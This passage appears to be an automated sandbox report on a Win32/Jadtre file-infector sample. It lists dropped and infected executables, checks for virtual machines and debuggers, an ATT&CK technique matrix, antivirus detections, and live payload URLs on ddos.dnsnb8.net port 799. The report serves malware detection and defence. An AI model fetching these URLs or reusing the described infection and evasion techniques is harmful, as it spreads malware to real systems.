    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005CF1C5 push ecx; ret 0_2_005CF1D8
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D16076 push 00D114E1h; ret 2_2_00D16425
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D11638 push dword ptr [00D13084h]; ret 2_2_00D1170E
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D12D9B push ecx; ret 2_2_00D12DAB
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D1600A push ebp; ret 2_2_00D1600D
    Source: BXOZIGZEUa.exeStatic PE information: section name: uY entropy: 6.933836062310107
    Source: JdEV.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
    Source: SciTE.exe.2.drStatic PE information: section name: u entropy: 6.934632238899902
    Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ entropy: 6.933745853880427
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR entropy: 6.935226585670217

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Users\user\AppData\Local\Temp\JdEV.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Users\user\Desktop\uninstall.logJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 799
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_0051814E IsWindowVisible,IsIconic,0_2_0051814E
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_0052A4EB GetParent,GetParent,IsIconic,GetParent,0_2_0052A4EB
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_00524603 IsIconic,PostMessageW,0_2_00524603
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004F0624 SetForegroundWindow,IsIconic,0_2_004F0624
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004F06C8 IsIconic,0_2_004F06C8
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_00522724 IsWindow,GetFocus,IsChild,SendMessageW,IsChild,SendMessageW,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,0_2_00522724
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005109D9 GetClientRect,IsRectEmpty,IsIconic,BeginDeferWindowPos,GetClientRect,IsRectEmpty,IsRectEmpty,EqualRect,GetWindowRect,GetParent,EndDeferWindowPos,0_2_005109D9
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005231B3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,0_2_005231B3
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005231B3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,0_2_005231B3
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005231B3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,0_2_005231B3
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005234B3 IsWindowVisible,ScreenToClient,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,0_2_005234B3
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004FB730 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,0_2_004FB730
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_00523A3E IsWindow,IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,IsWindow,IsWindow,GetWindowRect,PtInRect,SendMessageW,PtInRect,SendMessageW,ScreenToClient,PtInRect,GetParent,SendMessageW,GetFocus,WindowFromPoint,SendMessageW,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,SendMessageW,0_2_00523A3E
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004DE757 __EH_prolog3_GS,GetDeviceCaps,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,_memset,GetTextCharsetInfo,lstrcpyW,lstrcpyW,EnumFontFamiliesW,EnumFontFamiliesW,lstrcpyW,EnumFontFamiliesW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,GetSystemMetrics,lstrcpyW,CreateFontIndirectW,GetStockObject,GetStockObject,GetObjectW,GetObjectW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,GetStockObject,GetObjectW,CreateFontIndirectW,CreateFontIndirectW,__EH_prolog3_GS,GetVersionExW,KiUserCallbackDispatcher,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004DE757
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004D2540 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,GetLastError,GetLastError,GetLastError,GetLastError,SetupDiGetDeviceRegistryPropertyW,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,SetupDiCallClassInstaller,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,0_2_004D2540
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-62961
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeAPI coverage: 4.2 %
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D11718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00D11754h2_2_00D11718
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004DB7F2 lstrlenW,SetLastError,FindFirstFileW,GetLastError,__wfullpath,__wsplitpath_s,__wmakepath_s,0_2_004DB7F2
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004DB3FE GetModuleHandleW,GetProcAddress,FindFirstFileW,0_2_004DB3FE
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004ED5ED __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,0_2_004ED5ED
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_00D129E2
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D12B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00D12B8C
    Source: Amcache.hve.2.drBinary or memory string: VMware
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.2.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.2.drBinary or memory string: VMware20,1hbin@
    Source: BXOZIGZEUa.exe, 00000000.00000002.2078356609.0000000000B78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware.NTamd64.6.2
    Source: Amcache.hve.2.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: BXOZIGZEUa.exe, 00000000.00000002.2078356609.0000000000B78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware.
    Source: Amcache.hve.2.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.2.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: JdEV.exe, 00000002.00000003.2080979564.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000002.00000002.2597372810.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000002.00000002.2597372810.0000000000D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.2.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.2.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.2.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.2.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.2.drBinary or memory string: vmci.sys
    Source: Amcache.hve.2.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.2.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.2.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.2.drBinary or memory string: VMware20,1
    Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.2.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.2.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.2.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.2.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.2.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual RAM
    Source: JdEV.exe, 00000002.00000002.2597372810.0000000000D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
    Source: Amcache.hve.2.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.2.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeAPI call chain: ExitProcess graph end nodegraph_0-62962
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeAPI call chain: ExitProcess graph end node
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005CC787 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005CC787
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005E397D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_005E397D
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_00676044 mov eax, dword ptr fs:[00000030h]0_2_00676044
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005E9DE5 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_005E9DE5
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005CC787 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005CC787
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005D3EF0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005D3EF0
    Source: SciTE.exe.2.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_005E22DF
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_005E2767
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_005E27CE
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_005E280A
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryExW,0_2_004D8F07
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: GetLocaleInfoA,0_2_005E5C9F
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004D2540 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,GetLastError,GetLastError,GetLastError,GetLastError,SetupDiGetDeviceRegistryPropertyW,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,SetupDiCallClassInstaller,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,0_2_004D2540
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005D20CC GetSystemTimeAsFileTime,__aulldiv,0_2_005D20CC
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004DE757 __EH_prolog3_GS,GetDeviceCaps,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,_memset,GetTextCharsetInfo,lstrcpyW,lstrcpyW,EnumFontFamiliesW,EnumFontFamiliesW,lstrcpyW,EnumFontFamiliesW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,GetSystemMetrics,lstrcpyW,CreateFontIndirectW,GetStockObject,GetStockObject,GetObjectW,GetObjectW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,GetStockObject,GetObjectW,CreateFontIndirectW,CreateFontIndirectW,__EH_prolog3_GS,GetVersionExW,KiUserCallbackDispatcher,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004DE757
    Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: JdEV.exe PID: 3524, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: JdEV.exe PID: 3524, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    11
    Masquerading
    31
    Input Capture
    11
    System Time Discovery
    1
    Taint Shared Content
    31
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts2
    Process Injection
    1
    Access Token Manipulation
    LSASS Memory1
    Query Registry
    Remote Desktop Protocol1
    Archive Collected Data
    11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    2
    Process Injection
    Security Account Manager131
    Security Software Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS1
    Process Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
    Obfuscated Files or Information
    LSA Secrets1
    Application Window Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain Credentials2
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSync23
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    BXOZIGZEUa.exe88%VirustotalBrowse
    BXOZIGZEUa.exe95%ReversingLabsWin32.Virus.Jadtre
    BXOZIGZEUa.exe100%AviraW32/Jadtre.B
    BXOZIGZEUa.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Users\user\AppData\Local\Temp\JdEV.exe100%AviraTR/Dldr.Small.Z.haljq
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\JdEV.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\JdEV.exe97%ReversingLabsWin32.Trojan.Skeeyah
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://ddos.dnsnb8.net:799/cj//k1.raru100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarS100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarGp100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rar100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://ddos.dnsnb8.net:799/cj//k1.rarfalse
        high
